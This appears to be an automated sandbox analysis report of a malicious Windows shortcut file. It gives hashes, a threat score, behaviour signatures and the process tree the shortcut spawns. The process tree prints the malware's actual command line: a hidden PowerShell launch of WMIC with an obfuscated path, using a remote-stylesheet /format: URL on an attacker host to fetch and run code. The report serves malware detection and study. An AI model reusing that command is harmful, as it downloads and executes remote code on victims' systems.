Overview

overview

8

Static

static

1

10b13164d1...18.lnk

windows7-x64

8

10b13164d1...18.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03-05-2024 14:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    10b13164d176e732956516a755f872c3_JaffaCakes118.lnk

  • Size

    1KB

  • MD5

    10b13164d176e732956516a755f872c3

  • SHA1

    6d449dcdc8c8949244f7a4806173688d1f10c199

  • SHA256

    067ea6c4222e17118af66c5c84e23e771ed9e5ef582062e60a881b0278fe9134

  • SHA512

    29ab0062c362b80512d0714bd4ef745ad5baf1036580da782346444e9031c8ed4e7fecfa76cd7930b1e3e9ac8371d28ef96e554d5497f4c38581f714b3029e5f

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\10b13164d176e732956516a755f872c3_JaffaCakes118.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" start-process 'C:\??*?\*3?\??*?\w?ic.?x?' '" os get LHKnccmxv, hhj266lgu, t986daWUI, HJrnmcxbi, organization /format:""http://hhs4666lu.cavalodetroia06.xyz:25098/04/?136025098mcxxiruj6"""' -WindowStyle Hidden
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\System32\wbem\WMIC.exe
        "C:\Windows\System32\wbem\WMIC.exe" os get LHKnccmxv, hhj266lgu, t986daWUI, HJrnmcxbi, organization /format:"http://hhs4666lu.cavalodetroia06.xyz:25098/04/?136025098mcxxiruj6"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2388

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2628-38-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2628-39-0x000000001B530000-0x000000001B812000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2628-40-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2628-41-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2628-45-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2628-44-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2628-43-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2628-42-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2628-46-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download